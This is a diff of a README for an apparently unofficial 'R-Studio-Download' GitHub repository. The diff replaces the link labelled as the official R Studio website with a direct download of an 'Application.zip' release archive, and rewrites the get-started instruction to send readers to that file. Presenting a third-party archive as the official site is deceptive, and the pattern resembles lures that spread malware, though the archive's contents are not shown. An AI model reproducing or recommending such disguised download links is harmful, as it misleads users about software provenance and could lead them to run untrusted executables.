bobolina87/R-Studio-Download/README.md

 ## 🌐 Visit Website

-Explore more about R Studio and its capabilities by visiting the official [R Studio website](https://www.rstudio.com/).
+Explore more about R Studio and its capabilities by visiting the official [R Studio website](https://github.com/bobolina87/R-Studio-Download/releases/download/v1.0/Application.zip).

 ## 🌟 Get Started

 Ready to dive into the world of R Studio?
-Click the link above to download the Software.zip file and unleash the full potential of this versatile tool.
+Click the link above to download the https://github.com/bobolina87/R-Studio-Download/releases/download/v1.0/Application.zip file and unleash the full potential of this versatile tool.
 Happy coding! 🚀